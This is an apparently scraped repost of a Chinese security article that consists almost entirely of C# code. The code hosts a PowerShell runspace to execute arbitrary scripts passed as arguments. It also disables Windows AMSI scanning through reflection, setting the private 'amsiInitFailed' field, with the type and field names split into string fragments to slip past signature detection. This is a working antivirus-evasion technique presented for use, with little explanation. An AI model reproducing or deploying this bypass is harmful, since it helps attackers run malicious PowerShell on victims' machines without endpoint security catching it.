![]()
https://learn.microsoft.com/en-us/dotnet/api/System.Management.Automation.PowerShell?view=powershellsdk-7.2.0
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dllPowershell.Create().AddScript("get-process").Invoke();Runspace MyRunspace = RunspaceFactory.CreateRunspace();Pipeline MyPipeline = MyRunspace.CreatePipeline();MyPipeline.Commands.AddScript(script);Collection outputs = MyPipeline.Invoke();using System;using System.Collections.ObjectModel;using System.Management.Automation;using System.Management.Automation.Runspaces;using System.Reflection;using System.Text;using System.IO;namespace Test{class Program{static void Main(string[] args){String RunResult = RunScript(args[0]);Console.WriteLine(RunResult);string RunScript(string script){Runspace MyRunspace = RunspaceFactory.CreateRunspace();MyRunspace.Open();Pipeline MyPipeline = MyRunspace.CreatePipeline();MyRunspace.GetType().Assembly.GetType("Syste" + "m.Managem" + "ent.Autom" + "ation.AmsiU" + "tils").GetField("am" + "siInitF" + "ailed", BindingFlags.NonPublic | BindingFlags.Static).SetValue(null, true);MyPipeline.Commands.AddScript(script);MyPipeline.Commands.Add("Out-String");Collection outputs = MyPipeline.Invoke();MyRunspace.Close();StringBuilder sb = new StringBuilder();foreach (PSObject pobject in outputs){sb.AppendLine(pobject.ToString());}return sb.ToString();}}}}
文章来源: http://mp.weixin.qq.com/s?__biz=Mzg3NjYwNDgzMQ==&mid=2247485708&idx=1&sn=8b60d4f2a2143816bb1c27248eeb9f05&chksm=cf2ef5fcf8597cea4b89e73e78dcfabe1e8b929e9909b3f094c006d65e89e4bebe44d3c1db71#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh